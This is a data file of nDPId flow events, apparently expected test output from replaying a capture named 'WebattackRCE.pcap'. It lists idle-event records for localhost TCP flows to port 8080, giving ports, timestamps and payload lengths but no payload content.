+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276863,"flow_last_seen":1576420276863,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49792,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276864,"flow_last_seen":1576420276864,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49794,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276865,"flow_last_seen":1576420276865,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49796,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276866,"flow_last_seen":1576420276866,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49798,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276869,"flow_last_seen":1576420276869,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49800,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276870,"flow_last_seen":1576420276870,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49802,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276871,"flow_last_seen":1576420276871,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49804,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276872,"flow_last_seen":1576420276872,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49806,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276873,"flow_last_seen":1576420276873,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49808,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276874,"flow_last_seen":1576420276874,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49810,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276876,"flow_last_seen":1576420276876,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49812,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276877,"flow_last_seen":1576420276877,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49814,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276879,"flow_last_seen":1576420276879,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49816,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276881,"flow_last_seen":1576420276881,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49818,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276884,"flow_last_seen":1576420276884,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49820,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276885,"flow_last_seen":1576420276885,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49822,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276886,"flow_last_seen":1576420276886,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49824,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276888,"flow_last_seen":1576420276888,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49826,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276890,"flow_last_seen":1576420276890,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49828,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276891,"flow_last_seen":1576420276891,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49830,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276893,"flow_last_seen":1576420276893,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49832,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276894,"flow_last_seen":1576420276894,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49834,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276896,"flow_last_seen":1576420276896,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49836,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276897,"flow_last_seen":1576420276897,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49838,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276900,"flow_last_seen":1576420276900,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49840,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276901,"flow_last_seen":1576420276901,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49842,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276903,"flow_last_seen":1576420276903,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49844,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276904,"flow_last_seen":1576420276904,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49846,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276905,"flow_last_seen":1576420276905,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49848,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276907,"flow_last_seen":1576420276907,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49850,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276908,"flow_last_seen":1576420276908,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49852,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276910,"flow_last_seen":1576420276910,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49854,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276912,"flow_last_seen":1576420276912,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49856,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276913,"flow_last_seen":1576420276913,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49858,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276916,"flow_last_seen":1576420276916,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49860,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276917,"flow_last_seen":1576420276917,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49862,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276919,"flow_last_seen":1576420276919,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49864,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276920,"flow_last_seen":1576420276920,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49866,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276922,"flow_last_seen":1576420276922,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49868,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276924,"flow_last_seen":1576420276924,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49870,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276925,"flow_last_seen":1576420276925,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49872,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276926,"flow_last_seen":1576420276926,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49874,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276928,"flow_last_seen":1576420276928,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49876,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276929,"flow_last_seen":1576420276929,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49878,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276932,"flow_last_seen":1576420276932,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49880,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276933,"flow_last_seen":1576420276933,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49882,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
